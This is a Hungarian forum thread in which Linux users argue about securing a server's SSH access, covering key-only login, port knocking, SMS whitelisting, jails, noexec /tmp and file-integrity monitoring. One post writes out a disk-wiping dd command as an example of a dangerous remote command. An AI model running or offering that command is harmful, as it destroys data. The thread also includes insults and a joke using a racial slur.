Hmm, az ssh-s belépési kísérleteket 'altatni' 10-15 másodpercig? Egyszerű usernél nem sokat számít, a szótáras törést viszont egy-két nagyságrenddel lassítja, az meg már elég, ha nem fél nap kell hozzá, hanem másfél hónap, mert addig úgyis rá fogsz nézni a naplókra, és még arra is van időd, hogy megkeresd és félbehajtsd a derék próbálkozót.
- A hozzászóláshoz be kell jelentkezni
[quote:99b45aa14d="meditor"][quote:99b45aa14d="hunger"] A statisztikák alapján egyébként sem ssh-n történik a legtöbb betörés.
Hanem hol?
Webes script hibákat kihasználva (php/asp/cgi/perl/python, stb.), de ezek jórészét script kiddiek csinálják, azért _script_ kiddiek. :) Amíg ezek ellen sincsenek jórészt védve az interneten lévő gépek, addig nincs miről beszélni. ssh elé mindenféle bűvös dolgot tenni, teljesen felesleges. Egy script kiddie ilyen irányú próbálkozásai ellen az is elég, ha nincsenek könnyen kitalálható jelszavak. Amelyik jelszót meg lehet fejteni szótár alapú támadással az nem sokat ér.
- A hozzászóláshoz be kell jelentkezni
[quote:9595527017="trey"]Az nem lep be. Hasznaljon erre a celra olyan gepet aminek van fix IP-je (tovabb SSH-zas). Ha ilyen sincs neki, akkor nyaljon sot. :-)
[quote:9595527017="meditor"]És mit csinálsz azzal, aki nem fix ipről kell, hogy belépjen?
Na ez tipikusan az a rendszergazda aki istennek kepzeli magat, a userek meg dogoljenek meg. A szerver nem azert van, hogy a rendszergazda adminisztralgasson meg mentegessen, hanem azert hogy a felhasznalok felhasznaljanak szvsz. Az hogy a felhasznalo meg nem tud fix iprol belepni, az az isp-k szolgaltatasainak koszonhetoek. Valoszinu, hogy ez utobbiak nem fognak valtoztatni az uzletpolitikajukon, tehat a rendszergazdaknak kell alkalmazkodniuk. A port kopogtatas jo otlet, de pl mobiltelefonos megoldas is szoba johet. A user sms-ben elkuld egy nyilt kulcsot + ip cimet es kap 1,2,x oras belepesi lehetoseget. Ezt a nyilt kulcsot lehet hetente 1x szinkronizalni bent a cegnel. Ceges elofizetes eseten meg az sms ara sem folrengeto osszeg. Kis rutinnal eleg jo policyt lehet beallitani hozza.
Udv Zoli
- A hozzászóláshoz be kell jelentkezni
Nos andrej_ oké ez gond, de én nem erre értettem, és leírtam olyan nincs hogy újabb bugokat ne találnának vagy réseket amiket esetleg ki lehet használni, mindenre nem tudsz odafigyelni, de attól még hogy mindet elzársz a userektől mert az biztonságos, nem biztos hogy az a célravezető, itt erre értettem. És nem napi 24 órában gondoltam, az lehetetlen. Ebbe lehet nem gondoltam bele annyira, akkor elnézést.
- A hozzászóláshoz be kell jelentkezni
[quote:d1ff1335db="colos"][quote:d1ff1335db="trey"]Az nem lep be. Hasznaljon erre a celra olyan gepet aminek van fix IP-je (tovabb SSH-zas). Ha ilyen sincs neki, akkor nyaljon sot. :-)
[quote:d1ff1335db="meditor"]És mit csinálsz azzal, aki nem fix ipről kell, hogy belépjen?
Na ez tipikusan az a rendszergazda aki istennek kepzeli magat, a userek meg dogoljenek meg. A szerver nem azert van, hogy a rendszergazda adminisztralgasson meg mentegessen, hanem azert hogy a felhasznalok felhasznaljanak szvsz. Az hogy a felhasznalo meg nem tud fix iprol belepni, az az isp-k szolgaltatasainak koszonhetoek. Valoszinu, hogy ez utobbiak nem fognak valtoztatni az uzletpolitikajukon, tehat a rendszergazdaknak kell alkalmazkodniuk. A port kopogtatas jo otlet, de pl mobiltelefonos megoldas is szoba johet. A user sms-ben elkuld egy nyilt kulcsot + ip cimet es kap 1,2,x oras belepesi lehetoseget. Ezt a nyilt kulcsot lehet hetente 1x szinkronizalni bent a cegnel. Ceges elofizetes eseten meg az sms ara sem folrengeto osszeg. Kis rutinnal eleg jo policyt lehet beallitani hozza.
Udv Zoli
...de attól még az userek megdögölhetnek. :) Mi is a felhasználóneved? klaty..klatyi. klatty :)
- A hozzászóláshoz be kell jelentkezni
A port kopogtatas jo otlet, de pl mobiltelefonos megoldas is szoba johet. A user sms-ben elkuld egy nyilt kulcsot + ip cimet es kap 1,2,x oras belepesi lehetoseget. Ezt a nyilt kulcsot lehet hetente 1x szinkronizalni bent a cegnel. Ceges elofizetes eseten meg az sms ara sem folrengeto osszeg. Kis rutinnal eleg jo policyt lehet beallitani hozza.
És ezt miért nem lehet webes felületen megcsinálni? User kinyitja a cég ssl-es oldalát, a szervernek már meg is van az ip-cím, user beírja a jelszót és már rajta is van a whitelisten...
- A hozzászóláshoz be kell jelentkezni
[quote:f9b08ce4dc="bitumen"]
A port kopogtatas jo otlet, de pl mobiltelefonos megoldas is szoba johet. A user sms-ben elkuld egy nyilt kulcsot + ip cimet es kap 1,2,x oras belepesi lehetoseget. Ezt a nyilt kulcsot lehet hetente 1x szinkronizalni bent a cegnel. Ceges elofizetes eseten meg az sms ara sem folrengeto osszeg. Kis rutinnal eleg jo policyt lehet beallitani hozza.
És ezt miért nem lehet webes felületen megcsinálni? User kinyitja a cég ssl-es oldalát, a szervernek már meg is van az ip-cím, user beírja a jelszót és már rajta is van a whitelisten...
Jelenleg jobban torhetoek a webszerverek mint a mobiltelefonok tudomasom szerint
- A hozzászóláshoz be kell jelentkezni
[quote:055c9d3c19="_Polesz_"]Először is bocs, a kirohanásomért, de valahogy morcos voltam tegnap és mivel inkább fikáztál (főleg drastik kolléga) ezért írtam amit írtam... Na mindegy fátylat rá, ha lehet.
Tehát a biztonság alapjai:
1. Alapból mindent tiltunk amit nem engedünk meg, tehát elejét vesszük, hogy bármi is be/ki kommunikáljon.
2. A rendszergazdán kivül lokális júzer csak is nagyon indokolt esetben van, és az is jól elszeparálva (chroot, jail etc)
3. SSH ha lehetséges nem ismert porton fut és publikus kulcs hozzáféréssel érhető csak el.
4. A fontos és futó szolgáltatások nem root joggal futnak és állandóan up-to-date állapotban vannak biztonsági szempontból
5. A security értesítők folyamatos figyelése (lehetséges hibák kiszűrése céljából)
6. Állandó mentés a fontos adatokról.
7. A rendszer folyamatos követése és a változásokról azonnali értesítés, gondolok itt arról, hogy valaki belépett a rendszerbe kiadott egy su parancsot etc..
8...???
Nagyjából ennyi ami az alapokat érinti és ezt lehet még a végtelenségig fokozni???
Security témakörben a legelső kérdés amelyen el kell gondolkozni, hogy ki ellen akarod megvédeni a rendszeredet? Ha erre meg van a válasz, akkor lehet utána tovább menni.
- A hozzászóláshoz be kell jelentkezni
Jelenleg jobban torhetoek a webszerverek mint a mobiltelefonok tudomasom szerint
jogos.
- A hozzászóláshoz be kell jelentkezni
Elsősorban az SSH v1 törhető meg... Általában elég a védelemhez egy v1 tiltás + erős jelszó.
- A hozzászóláshoz be kell jelentkezni
[quote:9fcd46726a="szaszg"]Te sose voltal meg ugy besszivva, hogy hulyesegeket irtal????
Ha lettem volna, akkor sem írnám nyilvános fórumba :roll:
- A hozzászóláshoz be kell jelentkezni
[quote:2fe6590b46="Frantique"]Elsősorban az SSH v1 törhető meg... Általában elég a védelemhez egy v1 tiltás + erős jelszó.
altalaban igen, de a betegesen paranoiasoknak nem :wink:
- A hozzászóláshoz be kell jelentkezni
[quote:5eaae699e4="bitumen"][quote:5eaae699e4="szaszg"]Te sose voltal meg ugy besszivva, hogy hulyesegeket irtal????
Ha lettem volna, akkor sem írnám nyilvános fórumba :roll:
Azt már megfigyeltem hogy vannak olyanok akik "egyéb külső" körülményre hárítják a hibáikat... :)
Ilyenek pl.
[:5eaae699e4]
* nem aludtam 63454 órája
* be voltam rúgva
* nem is én voltam hanem a kisöcsém
* stb...
[/:u:5eaae699e4]
Nem lenne egyszerűbb elfogadni a kritikát? :)
[/]
- A hozzászóláshoz be kell jelentkezni
[quote:c8aaf3e8a7="csillagocska"]Nos andrej_ oké ez gond, de én nem erre értettem, és leírtam olyan nincs hogy újabb bugokat ne találnának vagy réseket amiket esetleg ki lehet használni, mindenre nem tudsz odafigyelni, de attól még hogy mindet elzársz a userektől mert az biztonságos, nem biztos hogy az a célravezető, itt erre értettem. És nem napi 24 órában gondoltam, az lehetetlen. Ebbe lehet nem gondoltam bele annyira, akkor elnézést.
Pedig bele kell gondolni, no offense. Az újabb bugok ellen pedig nem tudsz vagy esetleg csak minták alapján lehet védekezni. A juzernek pedig miért kell olyanhoz hozzáférnie, amihez nincs joga/köze vagy nem szükséges neki?
Koncepció: Tegyük fel hozzáfér sokmindenhez, ami jó dolog meg kényelmes.
Jön egy hiba valamiben (amivel root szerezhető), amihez hozzáférhet, de sosem használja és nem is kell neki. Ha valahogy bejutnak a gépre (mondjuk publikus szolgáltatásban shell szerezhető) és rögtön ezt keresik akkor azonnal szeeeevuuuusz (hogy idézzek egy klasszikust) van. Mindezt egy olyan hiba miatt, amit _csak_ azért használhattak ki, mert az amúgy érdektelen (juzernek) dologhoz hozzáfértek.
Ez a két hiba egyébként annyira klasszikus, hogy nagyon.
- A hozzászóláshoz be kell jelentkezni
[quote:413143eba4="andrej_"][quote:413143eba4="csillagocska"]Nos andrej_ oké ez gond, de én nem erre értettem, és leírtam olyan nincs hogy újabb bugokat ne találnának vagy réseket amiket esetleg ki lehet használni, mindenre nem tudsz odafigyelni, de attól még hogy mindet elzársz a userektől mert az biztonságos, nem biztos hogy az a célravezető, itt erre értettem. És nem napi 24 órában gondoltam, az lehetetlen. Ebbe lehet nem gondoltam bele annyira, akkor elnézést.
Pedig bele kell gondolni, no offense. Az újabb bugok ellen pedig nem tudsz vagy esetleg csak minták alapján lehet védekezni. A juzernek pedig miért kell olyanhoz hozzáférnie, amihez nincs joga/köze vagy nem szükséges neki?
Koncepció: Tegyük fel hozzáfér sokmindenhez, ami jó dolog meg kényelmes.
Jön egy hiba valamiben (amivel root szerezhető), amihez hozzáférhet, de sosem használja és nem is kell neki. Ha valahogy bejutnak a gépre (mondjuk publikus szolgáltatásban shell szerezhető) és rögtön ezt keresik akkor azonnal szeeeevuuuusz (hogy idézzek egy klasszikust) van. Mindezt egy olyan hiba miatt, amit _csak_ azért használhattak ki, mert az amúgy érdektelen (juzernek) dologhoz hozzáfértek.
Ez a két hiba egyébként annyira klasszikus, hogy nagyon.
Végülis totál igazad van, korlátozni kell a júzereket amennyire lehetséges és az adott szituáció megköveteli. Fokozni a biztonságot ameddig nem megy a használhatóság rovására (ahogy már kifejtették figyelembe véve a szerver funkcióit is). Kb ez lenne a biztonságos védekezés egyik mérföldköve egy publikus de nem létfontosságú szerveren?
- A hozzászóláshoz be kell jelentkezni
[quote:af974e938b="hunger"][quote:af974e938b="csillagocska"]Sziasztok!
Én mint kezdő linuxos úgy gondolom, hogy aki shellt kap abban vagy bízik az ember vagy nem. Olyan azért nincs hogy senkiben sem, mert feltételezem aki be tud ssh znia serverre abban megbízik az ember, míg az ellenkezője be nem bizonyosodik. :x
Kár hogy hasonlatokat nem hoztál. Pl.: csak azzal fexel le gumi nélkül akiben megbízol és hasonlók. :P
[quote:af974e938b="csillagocska"]Nálunk a serveren a root jelszó jól ki van találva ezt próbálták megtörni nem tudták
Nemsemmi... gondolom iszonyat brainstorming lehetett jól kitalálni egy root jelszót. :lol:
[quote:af974e938b="csillagocska"]A rendszergazda feladata az hogy kiszűrje az ilyen tevékenységeket, mert ha nem lennének ilyenek valószínű rendszergazdára sem nagyon lenne szükség. :roll:
És akkor aztán már végképp a villanyszerelő nagypapa és a hűtőgépszerelő józsi tervezné és telepítené a rendszert a bankoknál is.
[quote:af974e938b="csillagocska"]A védelmet persze erősíteni kell.
Hú, hát a szívemből beszélsz! :D
Banki telepítést nem válalok csakk a klimát esetleg a spájz hűtését meg a szerverterem hűtését.
- A hozzászóláshoz be kell jelentkezni
Most találtam véletlenül:
http://magenta.linuxforum.hu/index.php?q=node/778/1818#comment-1818
- A hozzászóláshoz be kell jelentkezni
[quote:6ea942031b="andrej_"][quote:6ea942031b="csillagocska"]Egészségedre ha ittál, és remélem nagyon nem csúszott félre. 8) Én csupán azt írtam le amit tapasztaltam és a véleményem a témához. Te biztos jóval okosabb és ügyesebb vagy mint más. 8) Én nem szégyellek másoktól tanulni, és kérdezni.
A rendszergazda szerinted hogy tudja "figyelni a rendszert"? Ezt fejtsed ki légyszives, különös tekintettel arra, hogy napi 24 órában állandóan és _bármilyen_ megtörési kisérletet azonnal észrevegyen. Mondjuk amíg megebédelsz bedarálják a gépet egy rossz beállítás miatt (amiről csak később derül ki, hogy rossz persze). Ilyenkor mivan? Nem szűrted ki, mert lame vagy? Publikus webszerveren ennél is jobb a helyzet, mert a juzerek mindent szeretnének, ami azzal jár, hogy a phpBB és pl. mambo exploitok is lefuthatnak. Legszebb, hogy nem is biztos, hogy észreveszed a néhány száz processben azt aki épp lappang.
A rossz shellbe írt "su -" -t pedig már szerintem sokan elkövettük és még mindíg élünk.
Hűtéstechnikában van hállózati monitoros munkatárs. Na ebből van általában 6 személy aki csak a hállózati hűtőket sasolja az internetten. Egyszere 40-50 hállózatot. Ja , hogy ö nem a helyi rendszergazda hanem a táv felűgyelő csoport. :)
- A hozzászóláshoz be kell jelentkezni
[quote:44959a6024="_Polesz_"][quote:44959a6024="andrej_"][quote:44959a6024="csillagocska"]Nos andrej_ oké ez gond, de én nem erre értettem, és leírtam olyan nincs hogy újabb bugokat ne találnának vagy réseket amiket esetleg ki lehet használni, mindenre nem tudsz odafigyelni, de attól még hogy mindet elzársz a userektől mert az biztonságos, nem biztos hogy az a célravezető, itt erre értettem. És nem napi 24 órában gondoltam, az lehetetlen. Ebbe lehet nem gondoltam bele annyira, akkor elnézést.
Pedig bele kell gondolni, no offense. Az újabb bugok ellen pedig nem tudsz vagy esetleg csak minták alapján lehet védekezni. A juzernek pedig miért kell olyanhoz hozzáférnie, amihez nincs joga/köze vagy nem szükséges neki?
Koncepció: Tegyük fel hozzáfér sokmindenhez, ami jó dolog meg kényelmes.
Jön egy hiba valamiben (amivel root szerezhető), amihez hozzáférhet, de sosem használja és nem is kell neki. Ha valahogy bejutnak a gépre (mondjuk publikus szolgáltatásban shell szerezhető) és rögtön ezt keresik akkor azonnal szeeeevuuuusz (hogy idézzek egy klasszikust) van. Mindezt egy olyan hiba miatt, amit _csak_ azért használhattak ki, mert az amúgy érdektelen (juzernek) dologhoz hozzáfértek.
Ez a két hiba egyébként annyira klasszikus, hogy nagyon.
Végülis totál igazad van, korlátozni kell a júzereket amennyire lehetséges és az adott szituáció megköveteli. Fokozni a biztonságot ameddig nem megy a használhatóság rovására (ahogy már kifejtették figyelembe véve a szerver funkcióit is). Kb ez lenne a biztonságos védekezés egyik mérföldköve egy publikus de nem létfontosságú szerveren?
Alapvetően bármilyen gépen fontos. Példa: a libjpg-ben vagy miben felfedezett puffertulcsordulás. Aki windowson "rootkent" valahogy egy ilyen kepet megnezett ott simán elég nagy bajok lehettek. Ugyanezt ha normálisan csak sima juzerként (bármilyen megfelelő OS-en) tette valaki, akkor max. a saját cuccait érhette kár. Ez utóbbi persze szintén nem jó, de még mindíg jobb, mintha a teljes rendszer kompromitálható így.
Azt ugye nem kell mondani, hogy mennyire nagy divatja van az x-ezer gépes zombihálózatoknak?
- A hozzászóláshoz be kell jelentkezni
Azt hittem itt lehet tanulni de ebben a formában nem kérek belőle. :) Lehet a másikat totálisan lenullázni, mert nincs tisztában dolgokkal, de nem fogom kitenni magam megjegyzéseknek csak azért mert, megpróbálok a magam szintjén írni mégha az nem is mindig korrekt és pontos, de lehet csak nem tudom pontosan megfogalmazni amit szeretnék.
- A hozzászóláshoz be kell jelentkezni
Tényleg leht itt tanulni. Hűtőgépészként itt tanultam meg beállitani a saját informatikai rndszeremet. Illetve még a linuxforum segitségével. (Nem egy webb szervere kel gondolni , hanem az othoni íroda és játékra hsznált gépre.)
- A hozzászóláshoz be kell jelentkezni
Igen vannak akiktől lehet kérdezni de vannak akik másokat totálisan lenéznek. És miért kell nekem midne egyes lenéző megjegyzést elnéznem csupán csak azért mert próbálok a magam tudása szerint hozzászólnia témához? ebből is tanultam, jobb ha inkább le sem írom csak olvasok, de kérdezni nem fogok.
- A hozzászóláshoz be kell jelentkezni
Ilyenek pl.
* nem aludtam 63454 órája
* be voltam rúgva
* nem is én voltam hanem a kisöcsém
* PP vagyok
* stb...
;)
- A hozzászóláshoz be kell jelentkezni
[quote:68630aad92="csillagocska"]ebből is tanultam, jobb ha inkább le sem írom csak olvasok, de kérdezni nem fogok.
bahh...
ez itt a valo vilag:P
- A hozzászóláshoz be kell jelentkezni
Egy nagyon fontos dolgot kiemelnék - azt hiszem andrejtől hangzott el -
minél egyszerűbbre kell csinálni a rendszert (beleértve a védelmet is),
mert minden újabb elem újabb hiba forrás.
És egy másik tanulság: csak azoknak shell, akiknek muszáj. (Ez talán
összefügg az egyszerűséggel.)
A 3. szempont: a hozzáférés időtényezője: ha nyújtani tudod az időt
drasztikusan nő a feltörésre szánt erőforrások mennyisége.
És végül: nem abszolút jót kell csinálni, hanem a gyenge átlagnál jobbat.
Hogy legyen nálad könnyebb préda. Erről egy vicc: Megy a néger, meg a
fehér a sivatagban. Jön az oroszlán. Leveszi a néger a hátizsákját és kivesz
egy szöges cipőt. Aszondja a fehér: Mivan? Te gyorsabban akarsz futni az
oroszlánnál? Mire a néger: Nem, én nálad akarok gyorsabban futni.
- A hozzászóláshoz be kell jelentkezni
[quote:c3216c2293="muszashi"]Na, hogy kicsit komolyabb irányba visszatereljük a szót, nálam például E-mailek jönnek a szerverektől. Nem sok, ert azt nem olvasnám, de ami biztosan jön minden nap:
* napi mentésről egy eredmény, alap esetben egy idő+dátum+ellenörző összeg OK, ha nem így lenne, akkor részletes napló. (ez tuóbbi fájlba mindig elkészül) Ez hajnali 1-2 felé jön, leghamarabb reggel nézem. ..hacsak nem szuttyogok az éjjszaka.
* rendszer integritás állapotáról naponta 6:25-kor. (Ez az összes fontos fájl változását figyeli és küldi az eredményt. Mely fájlok, mikor módosultak. .persze nem /var/log meg /home :)
Áramszünet esetén jön a mail, ha visszajött az áram, akkor is.
Ennyi jön. Ezen kívül minden nap 1X be SSH-zok a szerverekre, szúrópróbaszerűen megnézek 1-2 naplót, nézek egy apt-get update -t, ilyesmit. Tehát kicsit élvezem az üzemeltetést. Ennél többször csak akkor lépek be, ha kell valamit csinálni, vagy nem jön meg valamelyik usernek mail és meg kell nézni a naplóban, hogy miért. (utána meg
telefonálnom kell, hogy mit állítson be a küldő a szerverén, vagy a DNS-én :)
Üdv: M.
- Muszashi engem erdekelnenek ezek a szkriptek, mind a harom, eltudnad kuldeni? Privatba is johet, koszonom.
ltn
- A hozzászóláshoz be kell jelentkezni
[quote:1680a44616="csillagocska"]Igen vannak akiktől lehet kérdezni de vannak akik másokat totálisan lenéznek. És miért kell nekem midne egyes lenéző megjegyzést elnéznem csupán csak azért mert próbálok a magam tudása szerint hozzászólnia témához? ebből is tanultam, jobb ha inkább le sem írom csak olvasok, de kérdezni nem fogok.
Általában a rejtet kisebségikomlexusal rendelkezők szokták erősíteni leszolásal a picike kis egójukat.
Na ezért szoktam röhögni rajtuk.
- A hozzászóláshoz be kell jelentkezni
Meditor ez a hozzászolás nagyon tetszet.
- A hozzászóláshoz be kell jelentkezni
[quote:0975316006="8192Joco"]Meditor ez a hozzászolás nagyon tetszet.
Ha valóban így van, akkor örülök. (-::
- A hozzászóláshoz be kell jelentkezni
És végül: nem abszolút jót kell csinálni, hanem a gyenge átlagnál jobbat. Hogy legyen nálad könnyebb préda. Erről egy vicc: Megy a néger, meg a fehér a sivatagban. Jön az oroszlán. Leveszi a néger a hátizsákját és kivesz egy szöges cipőt. Aszondja a fehér: Mivan? Te gyorsabban akarsz futni az oroszlánnál? Mire a néger: Nem, én nálad akarok gyorsabban futni.
Ha valaki be akar jutni egy ilyen rendszerbe (pl személyes okból), akkor be is jut. A x az szivatni akarja az y-t, akkor mindegy, hogy a z-nek milyen rendszere van...
Script kiddiek ellen persze véd az "átlagosnál jobb" rendszer.
szvsz.
- A hozzászóláshoz be kell jelentkezni
[quote:c80e34dda3="meditor"]Erről egy vicc: Megy a néger, meg a
fehér a sivatagban. Jön az oroszlán.
Ezt nem a SONY vezére mondta?
- A hozzászóláshoz be kell jelentkezni
[quote:834494d1c6="gsimon"]A /tmp-t is noexec-re
agyon is vagtal minden progit, aki shell script-et akar futtatni (pl.: mc)
Zsiraf
p.s.: legyszi ne gyere a vim-mel, az mc csak egy pl.
- A hozzászóláshoz be kell jelentkezni
[quote:9dc25ecee3="_Polesz_"]
Először is bocs, a kirohanásomért, de valahogy morcos voltam tegnap és mivel inkább fikáztál (főleg drastik kolléga) ezért írtam amit írtam... Na mindegy fátylat rá, ha lehet.
semmibaj
:)
- A hozzászóláshoz be kell jelentkezni
[quote:73dbe2868f="lzrd"][quote:73dbe2868f="meditor"]Erről egy vicc: Megy a néger, meg a
fehér a sivatagban. Jön az oroszlán.
Ezt nem a SONY vezére mondta?
Nem tudom. Olvastam a könyvét anno, de nem esküdnék meg rá,
hogy onnan ismerem.
- A hozzászóláshoz be kell jelentkezni
[quote:b837a378ec="andrej_"]
Gondolom Kínából, Észak-Kórából és a Fidzsi szigetekről is be kell tudnod lépni. Azt vegyük már észre, hogy néhány hazai szolgáltató tartományára néhány /16-os ACCEPT vagy pass in rule-al talán még lehet élni és őrülten nagy karbantartást sem igényel. Ha olyan gép ami bármilyen okból publikus shellt ad, akkor tessék megoldani hogy chrootban legyen valami jailszerű (FreeBSD-vel pl. egészen kellemesen megoldható és még login classok meg MAC framework is van by default). Egyéb esetben, pedig a legkevesebb szükségesnél nem kell több shelljuzert kiadni.
Ezek a portknocking és más hasonló álmegoldások szerintem csak simán növelik a biztonsági kockázatot, amit pedig csökkenteni kéne. Ez a küldök egy SMS-t dolog is eléggé meredeken hangzik. Egyáltalán miért kell "bárhonnan" elérni egy gépet és ha ennyire fontos a biztonság, akkor miért nincs egy kevéssé publikus adminszerver, ahonnan lehet nyomulni?
Termeszetesen az egesz internet szukitheto egy vagy nehany cimtartomanyra. Csak azt nem ertem, hogy a portknocking hogyan noveli a biztonsagi kockazatot? Masreszt, ha van egy gateway szerverem ami sms-ben jelzi a fo szerverek mentesenek lefutasat, akkor visszafele miert nem mukodhet a dolog?
Udv Zoli
- A hozzászóláshoz be kell jelentkezni
[quote:bb9b85c197="szaszg"][quote:bb9b85c197="gsimon"]A /tmp-t is noexec-re
agyon is vagtal minden progit, aki shell script-et akar futtatni (pl.: mc)
Ezt nem értem. Igaz, hogy próbaképp csak egy file-on lévő ext2-t mountoltam rá loop device-szal (mount -o loop,noexec tmp.img /tmp)
[code:1:bb9b85c197]
/dev/loop/1 on /tmp type ext2 (rw,noexec)
[/code:1:bb9b85c197]
de shell és perl scriptek működtek simán és midnight-ból is, a cgi-bin-ből az apache is tudott futtatni mindent. Egyrészt ez a noexec csak binárisokra áll, mert a scriptet az értelmezője egyszerűen olvasásra nyitja, másrészt meg nem a tmp-ből futtattam volna őket, hanem pl. a home-omból.
- A hozzászóláshoz be kell jelentkezni
huh, jó ez a topic. megint könnyesre röhögtem magam...
- A hozzászóláshoz be kell jelentkezni
[quote:e82f5b947e="8192Joco"][quote:e82f5b947e="csillagocska"]Igen vannak akiktől lehet kérdezni de vannak akik másokat totálisan lenéznek. És miért kell nekem midne egyes lenéző megjegyzést elnéznem csupán csak azért mert próbálok a magam tudása szerint hozzászólnia témához? ebből is tanultam, jobb ha inkább le sem írom csak olvasok, de kérdezni nem fogok.
Általában a rejtet kisebségikomlexusal rendelkezők szokták erősíteni leszolásal a picike kis egójukat.
Na ezért szoktam röhögni rajtuk.
Azokrol az adatbazis/szoftver/hardver rendszergazdakrol most ne beszeljunk akik a munkahelyuk vedelme erdekeben nem irnak dokumentaciot az altaluk karbantartott rendszerrol, igy akarjak azt elhitetni az oriasi egojukkal, hogy oket nem merik kirugni a cegtol. Masreszt pont emiatt kell hozzaferest biztositani kivulrol az adatbazisos kolleganak, mert mast nem enged kozel az sql tablaihoz es a lekerdezeseihez.
Udv Zoli
- A hozzászóláshoz be kell jelentkezni
[quote:bdbdd6de57="hunger"]huh, jó ez a topic. megint könnyesre röhögtem magam...
?????????
- A hozzászóláshoz be kell jelentkezni
[quote:c4b312b490="colos"][quote:c4b312b490="8192Joco"][quote:c4b312b490="csillagocska"]Igen vannak akiktől lehet kérdezni de vannak akik másokat totálisan lenéznek. És miért kell nekem midne egyes lenéző megjegyzést elnéznem csupán csak azért mert próbálok a magam tudása szerint hozzászólnia témához? ebből is tanultam, jobb ha inkább le sem írom csak olvasok, de kérdezni nem fogok.
Általában a rejtet kisebségikomlexusal rendelkezők szokták erősíteni leszolásal a picike kis egójukat.
Na ezért szoktam röhögni rajtuk.
Azokrol az adatbazis/szoftver/hardver rendszergazdakrol most ne beszeljunk akik a munkahelyuk vedelme erdekeben nem irnak dokumentaciot az altaluk karbantartott rendszerrol, igy akarjak azt elhitetni az oriasi egojukkal, hogy oket nem merik kirugni a cegtol. Masreszt pont emiatt kell hozzaferest biztositani kivulrol az adatbazisos kolleganak, mert mast nem enged kozel az sql tablaihoz es a lekerdezeseihez.
Udv Zoli
Egy rendes helyen és főleg ahol sok gép van admin szerver, ahova és csak oda lehet kivülről belépni és onnan tovább. Szintén léteznek mindenféle VPN-es megoldások ha az kell. Node ezt Mr. Trey már írta itten.
colos, sms: szerintem egesz mas dolog egy allapotjelentes es egeszen mas egy parancskiadas a szervernek
- A hozzászóláshoz be kell jelentkezni
Csak azt nem ertem, hogy a portknocking hogyan noveli a biztonsagi kockazatot?
Ezt en sem. Szerintem kimondottan csokkenti, mivel egy lepessel bonyolultabba teszi a rendszered feltoreset, ergo egy csomo mas szerver valik nalad konnyebb predava.
- A hozzászóláshoz be kell jelentkezni
En csak arra vagyok kivancsi, hogy ki nyer ebben a "dick-measuring-contest"-ben, avagy ki lesz a hup legfobb onkinevezesu biztonsagi szakertoje... get a life! (akinek nem inge, ne vegye magara)
- A hozzászóláshoz be kell jelentkezni
muszashi: én is szívesen látnám a scripteket... okulni és ötleteket gyűjteni mindenképp jó
- A hozzászóláshoz be kell jelentkezni
[quote:fa5ef2cfa4="1aca"]En csak arra vagyok kivancsi, hogy ki nyer ebben a "dick-measuring-contest"-ben, avagy ki lesz a hup legfobb onkinevezesu biztonsagi szakertoje... get a life! (akinek nem inge, ne vegye magara)
:lol: we are proud to announce: hup-dick-measuring-contest 2006...
Szerintem amúgy az sms-es parancsküldés nem nagy kockázat: A "gonosznak" ki kell találni a titkos telefon számot, amelyik a szerveremhez tartozik és még a speciális sms szintakszisát is.
- A hozzászóláshoz be kell jelentkezni
[quote:a396d41fdd="tomyellow"][quote:a396d41fdd="meditor"]Az nmap is egy port-scan. Ezt is lehetne detektálni, szerintem. Nem üzemszerű, ha valaki másodpercenként tucatszor portot vált.
Nézd meg a portsentry-t! http://linux.cudeso.be/linuxdoc/portsentry.php
Üdv.: Tomyellow
remek kis eszkoz igazan
foleg hogy bugos es ezzel is meglehet tolni a geped
- A hozzászóláshoz be kell jelentkezni
[quote:46c58230e0="1aca"]En csak arra vagyok kivancsi, hogy ki nyer ebben a "dick-measuring-contest"-ben, avagy ki lesz a hup legfobb onkinevezesu biztonsagi szakertoje... get a life! (akinek nem inge, ne vegye magara)
Mindenkeppen az aki a topik hatasara uj modszereket/eljarasokat ismer meg es megtanulja azokat alkalmazni, igy nem tornek be hozza :wink:
[quote:46c58230e0="andrej_"] colos, sms: szerintem egesz mas dolog egy allapotjelentes es egeszen mas egy parancskiadas a szervernek
Nem olyan jellegu parancsra gondolok mint pl: dd if=/dev/zero of=/dev/hda, hanem egy nyilt kulcsra es egy parancskodra ami altal a fogado script nyit a tuzfalon egy portot amin keresztul mar be lehet sshra lepni
Udv Zoli
- A hozzászóláshoz be kell jelentkezni
[quote:22a5a990d9="hunger"]huh, jó ez a topic. megint könnyesre röhögtem magam...
a sracok nagy szekuriti expertek
topicnyitonak:
btw.
1. miert a 22 es porton fut az sshd
2. miertnem jailben futnak a szolgaltatasok(vagy uml)
3. miert lehet sshzni barhonnan a gepre
4. ha mar linux akkor miertnem pax
5. miert passwd es miertnem kulcs
6. hogyhogy az osszes user su-zhat rootra
ez aki megtorte a gepedet egy luzer
egy profit eszre sem vennel
- A hozzászóláshoz be kell jelentkezni
[quote:ed559e14cd="coder"]muszashi: én is szívesen látnám a scripteket... okulni és ötleteket gyűjteni mindenképp jó
Az hogy mi változott a fájlrendszeren:
apt-get install integrit
Sarge alatt. Egész hasznos.
- A hozzászóláshoz be kell jelentkezni
[quote:5617df3b32="lacika"][quote:5617df3b32="coder"]muszashi: én is szívesen látnám a scripteket... okulni és ötleteket gyűjteni mindenképp jó
Az hogy mi változott a fájlrendszeren:
apt-get install integrit
Sarge alatt. Egész hasznos.
...vagy tripwire...
- A hozzászóláshoz be kell jelentkezni
[quote:497b80f3ff="bitumen"][quote:497b80f3ff="lacika"][quote:497b80f3ff="coder"]muszashi: én is szívesen látnám a scripteket... okulni és ötleteket gyűjteni mindenképp jó
Az hogy mi változott a fájlrendszeren:
apt-get install integrit
Sarge alatt. Egész hasznos.
...vagy tripwire...
Igen, ez sem rossz, csak én az integrit -et ismertem meg elsőnek és bejött, de az általad írt is nagyon jó.
- A hozzászóláshoz be kell jelentkezni
Semmi extrák, ahogy fent már írták a kollégák:
*integrit (a fájlok figyelésére, csak be kell konfigolni, azt csinálja a dolgát)
* apcupsd (a szünetmentes figyelésére, csak be kell konfigolni, azt csinálja a dolgát)
* egyedül a mentésre írtam scriptet, de az se egy nagy csattanás, mivel kb 3,6 Gb adat van, csak napközben használják (8-22) így minden nap teljes mentés megy DVD +RW-re hajnalban, amikor nem kell a gép.
Annyival egyszerüsítettem csak az életem, hogy a /home alatt van a profiles könyvtár is, az összes samba megosztás, meg a Maildir könyvtárak, így a /home mentésével minden mentve van. (Persze a sambába be kellett állítani, hogy az user home-ja alatt ne jelenjen meg a Maildir könyvtár, különben az user még letörölné:)
